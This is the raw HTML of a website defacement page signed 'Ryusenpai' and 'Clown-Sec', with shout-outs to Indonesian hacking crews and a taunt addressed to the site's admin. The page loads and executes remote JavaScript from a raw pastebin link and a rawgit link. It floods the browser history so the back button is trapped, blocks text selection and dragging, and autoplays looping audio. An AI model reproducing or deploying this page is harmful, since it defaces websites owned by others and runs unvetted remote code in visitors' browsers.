<html>

 <head> 

 </head> 

 <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">

   Ryusenpai.id 

  <audio src="https://b.top4top.io/m_180434tqp0.mp3" autoplay="autoplay"></audio> 

  <script>

(function () {

for(var i = 0; i < 20; i++) {

history.pushState(null, document.title, window.location.href );

}

})(document, window, history);

</script> 

  <script>

        alert("TouchedBy Ryusenpai");

    </script> 

  <meta property="og:image" content="http://baliforyou.com/x.jpg"> 

  <meta property="og:image:secure_url" content="http://baliforyou.com/x.jpg"> 

  <meta property="og:audio" content="http://baliforyou.com/zxmbxe_.mp3"> 

  <link rel="icon" type="image/x-icon" href="https://i.pinimg.com/originals/5e/b8/11/5eb8114fb8c31c8fb7906129f4ac8896.png"> 

  <title>Touched By Ryusenpai</title> 

  <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> 

  <meta name="theme-color" content="black"> 

  <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"> 

  <meta name="description" content="NEVER SURENDER"> 

  <meta name="author" content="C0R3X, Clown-Sec"> 

  <meta name="keywords" content="C0R3X, Clown-Sec"> 

  <meta name="googlebot" content="all"> 

  <meta name="robots" content="all"> 

  <meta name="googlebot-news" content="all"> 

  <meta name="google" content="notranslate"> 

  <meta name="og:title" content="Owned by C0R3X >||< Clown-Sec"> 

  <meta property="og:type" content="website"> 

  <meta property="og:updated_time" content="1440432930"> 

  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 

  <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script> 

  <script type="text/javascript" src="https://cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek%20salju.js"></script> 

  <style type="text/css">

@import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");

body{

     overflow:hidden;

     display: flex;

     align-items: center;

     justify-content: center;

     margin:0;

     padding:0;

     width:100%;

     background-color:#000;

     }

i{

margin:10px;

}

a:link{

color:#000;

}

h1{

  color: #000;

  text-decoration: none;

  border-radius:0px;

  border:0px;

  font-family: 'Shadows Into Light', cursive;

  font-size:50px;

  margin:0px;

  padding:0px;

  animation:lamerkaratan 0.1s linear infinite;

}

pre{

color:white;

}

marquee{

width:100%;

}

@keyframes lamerkaratan{

2%{color:#fff;}

3%{transform:translate(2px,-10px) skewX(3240deg);}

5%{transform:translate(0px,0px) skewX(0deg);}

2% , 54%{transform:translateX(0px) skew(0deg);}

55%{transform:translate(-2px,6px) skew(-5530deg);}

56%{transform:translate(0px,0px) skew(0deg);}

57%{transform:translate(4px,-10px) skew(-70deg);}

58%{transform:translate(0px,0px) skew(0deg);}

62%{transform:translate(0px,20px) skew(0deg);}

63%{transform:translate(4px,-2px) skew(0deg);}

90%{transform:translate(1px,3px); skew(-230deg);}

95%{transform:translate(-7px,2px); skew(-120deg);}

100%{transform:translate(0px,0px) skew(0deg);}

</style> 

  <embed src="https://h.top4top.io/m_18009m5wa0.mp3" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> 

  <center> 

   <img title="Pixy-Sec" class="picture" src="https://s.kaskus.id/images/2012/12/26/4383391_20121226011159.gif"> 

   <br> 

   <h1><font color="red">TouchedBy</font> Ryusenpai</h1> 

   <br> 

   <font <p class="blink_text" color"="white"> <p class="blink_text" style="font-size:40px;color: white;text-shadow: 0px 0px 0px #00ffff, 3px 3px 5px   #87CEEB;font-family:Kelly Slab;" <style="font-size:25px;color: orange;text-shadow: 10px 29px white , white;">" forgive us admin, we just want to leak the weakness of your website Gomen'nasai " 

     <marquee direction="scroll"> 

      <pre><font color="red">Ryusenpai</font> - Clown Security Team - Indonesian Fighter Cyber - Indonesian Down Security - DarkGhostHacker45Team - LuciferXploit - Biohazard Cyber ~ Special thanks to - CUKIMAY CYBER TEAM - PURWOKERTO GHOST - PURBALINGGA ERROR SYSTEM - INDONESIAN CYBER JAWA - INDONESIAN GALAXY XPLOIT CYBER - BEKASI X-PLOIT - ANUBIS XPLOITER - DARK PEOPLE TEAM - RETURN OF SQUAD CYBER - BALIKPAPAN CYBER</pre> 

     </marquee> <br> </p><pre id="Clock" style="font-size:8px;font-family:iceland;color:#ff0000;margin:0;"></pre> 

    <audio autoplay="autoplay" controls="controls" src="" type="audio/mpeg"></audio> </font> 

  </center> 

  <font color="white"> </font> 

 </body>

</html>
